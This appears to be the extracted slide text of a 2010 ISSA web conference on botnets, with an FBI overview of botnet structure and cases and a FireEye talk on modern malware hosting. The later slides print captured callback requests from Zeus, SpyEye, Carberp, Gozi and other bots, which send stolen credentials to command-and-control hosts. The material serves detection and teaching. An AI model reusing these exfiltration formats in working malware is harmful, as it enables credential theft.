Botnets

ISSA Web Conference

Sponsored by:

October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Welcome: Conference Moderator

Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee

Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI

Rooting Out the Bad Actors

Alex Lanstein - Systems Consulting Engineer, FireEye

Joint Speaker Question & Answer

Closing Comments

UNCLASSIFIED

How Botnets Have Evolved

presented by Special Agent Chris Calderon FBI
UNCLASSIFIED

UNCLASSIFIED

Agenda
What is a botnet? How are botnets created? Why are botnets created? Basic structure of a botnet Taking down a botnet How botnets are evolving Botnets in the news Questions
UNCLASSIFIED

UNCLASSIFIED

What is a botnet?
A network of compromised computers (robots/bots) Controlled by a bot master / herder Used to carry out various illegal activities Services are often sold to other criminal elements

UNCLASSIFIED

UNCLASSIFIED

How are botnets created?

Setup
Obtain reliable infrastructure Develop malware and C&C software

Malware loaded onto victim machines Victims Done through exploits and/or social engineering Continually update software / instructions to bots Manage Maintain statistics for the botnet

UNCLASSIFIED

UNCLASSIFIED

Why are botnets created?

Spam Distributed Denial of Service (DDoS) Click Fraud Fake Anti-Virus Credential Theft Proxy Service Cyber Warfare
UNCLASSIFIED

UNCLASSIFIED

Basic Structure

C&C Server Bot Master / Herder C&C Server

Victim Victim Victim

UNCLASSIFIED

UNCLASSIFIED

Taking down a botnet

C&C Server Bot Master / Herder C&C Server

Victim Victim Victim

UNCLASSIFIED

UNCLASSIFIED

Botnets evolving

Proxy
C&C Server Bot Master / Herder C&C Server Proxy

Victim
Victim Victim

Proxy

Victim

UNCLASSIFIED

UNCLASSIFIED

Botnets evolving
Proxy Proxy Bot Master / Herder Proxy C&C Server C&C Victim

Server
Proxy

Victim
Victim Proxy Victim

UNCLASSIFIED

UNCLASSIFIED

Botnets in the news

ZEUS
Steels and logs online banking credentials Primarily targets high balance accounts Money mules used to get money to bad actors Kit now used by many different groups Estimated $70,000,000 stolen from US banks

UNCLASSIFIED

UNCLASSIFIED

Botnets in the news

MARIPOSA (BUTTERFLY)
Steels online credentials, and also used in DDoS attacks Estimated 12 million infected computers Bad actors traced to Spain and arrested Criminal proceedings ongoing

UNCLASSIFIED

UNCLASSIFIED

Botnets in the news

SPAM BOTS
Conficker, Cutwail, Waledac, . Up to 10 million bots per botnet Each botnet can send billions of spam emails per day Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, .

UNCLASSIFIED

UNCLASSIFIED

Questions?

UNCLASSIFIED

Rooting out the Bad Actors

or: p2p, fast flux, and other botnet myths

Alex Lanstein Senior Security Researcher FireEye, Inc.

Todays Agenda

Understanding the shift from conventional to modern malware, and the resultant hosting needs

A few TT&P to uncover older or moderately sophisticated malware

A detailed looked a few bots in the news
2
18

Conventional vs. Modern, APT Malware

Conventional Malware
Characterized by using spreading techniques, custom C&C transport protocols, IRC communication
Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots

Detectable through a variety of technologies/tactics:

NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS

Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.

3
19

Conventional vs. Modern Malware

Modern-ish malware:
Characterized by infecting via browser based exploits Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s) Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed

4
20

Worlds Top Malware

Source: FireEye Malware Intelligence Lab

21
21

Modern Malware Infection Lifecycle

1
System gets exploited
Drive-by attacks in casual browsing Links in Targeted Emails Socially engineered binaries
Compromised Web server, or Web 2.0 site

Callback Server

Dropper malware installs

First step to establish control Calls back out to criminal servers Found on compromised sites, and Web 2.0, user-created content sites
Perimeter Security
Signature, rule-based

Other gateway

Malicious data theft & longterm control established

Uploads data stolen via keyloggers, Trojans, bots, & file grabbers One exploit leads to dozens of infections on same system Criminals have built long-term control mechanisms into system

List-based, signatures

Desktop antivirus
Losing the threat arms race

22
22

Where is all this malware being hosted?

Previously we used to see malware being hosted on infected home machines Web filters responded by blocking access to domains that had multiple A records in residential IP space Now its being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space!

23

Root of the Problem

There is no Internet Police!

Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.

24

How the Internet is delegated

In the name space (think DNS):
ICANN Registries

Registries == Verisign, Affilias, ccTLD operators

Registries sell to certified gTLD and regional registrars

Registrars == namecheap.com, godaddy.com, netsol.com

Registrars sell to registrants (end user)

25

How the Internet is delegated

In the IP space:
ICANN/IANA (Internet Assigned Numbers Authority)

IANA RIRs
RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC

RIRs LIRs
LIRs are generally data centers and ISPs

26

27

28

29

ICANNt do anything!
ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesnt violate the contract. These contracts have no mention of content.

Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
Large pushback when someone even suspects they are trying to take an authoritative stance on something.

30

31

32

Big bots in 2010

Rustock still sticking around

POST /index.php?topic=33.117 HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://go-thailand-now.com/ Content-Type: application/x-www-form-urlencoded Content-Encoding: gzip UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: go-thailand-now.com Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache
18 34

Gozi
POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary=-------------------------139b9b3139b9b3139b9b3 User-Agent: IE Host: 91.216.215.130 Content-Length: 453 Pragma: no-cache

----------------------------139b9b3139b9b3139b9b3 Content-Disposition: form-data; name="upload_file"; filename="3759777034.21" Content-Type: application/octet-stream

URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove ----------------------------139b9b3139b9b3139b9b3--

19 35

Zeus
POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache

. ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q.. '7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.........mn.....@....We...jN>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:........".....;5..U. .t....!......f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>....0Y,.. ..".<.

20 36

Tigger Not just financials anymore

POST /track_c.cgi HTTP/1.0 Content-Length: 81 icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L . SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timez oneOct=4 20&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true &aw charset=UTF-8&KEYLOG=s}}}
21 37

SpyEye ZeuS replacement?

GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232 &ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKL AF24&md5=9012ab902413dcf8gga89 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: hahsdhsl.com Pragma: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: www.promohru.in Pragma: no-cache
22 38

Carberp Yet Another Datastealer

POST /recv.php HTTP/1.1 Host: 194.54.80.146 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; enUS; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html Connection: Close Content-Type: application/x-www-form-urlencoded Content-Length: 331 uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1 &data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7 CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww %2Estarwoodhotels%2Ecom%252Fpreferredguest%252Finde x%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2EC OM%26persist%3Dtrue%26password%3Dmypassword
23 39

TDSS Full on SSL

19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620 ....E ...1@.0.....q.... ....J[z7l.:........................J...F..L...N.]...xmvF..(..l...?},,nc{. .ygs.R...._........8.a#9cU....I..5................0...0..j. ...yV.9.x0 . *.H.. .....0E1.0 ..U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0.. 100114192303Z. 110114192303Z0E1.0 .U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0..0 . *.H.. .........0.......|.<..7...dt..IF0.~...;-..m.>.~Ra!f....O.Q....V...7q@..M....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(.......E.....0 . *.H.. .........@..p.Iru...Q.$K)..EF;....u.X......<... .;}....aa~>r.l.\......[.r.0@......%....S`...p.... .=3;..E.@...eq8OMw^7......"Zw..5.)g..........
24 40

Thank you! Alex Lanstein alanstein@fireeye.com

www.fireeye.com
For late-breaking malware research and news:

blog.fireeye.com
41
FireEye, Inc. Confidential 41

Joint Speaker Question & Answer

Chris Calderon Special Agent, FBI Alex Lanstein Systems Consulting Engineer, FireEye

42

Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference

Thank you to Citrix for donating this Webcast service

Online Meetings Made Easy

43

CPE Credit
Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.

44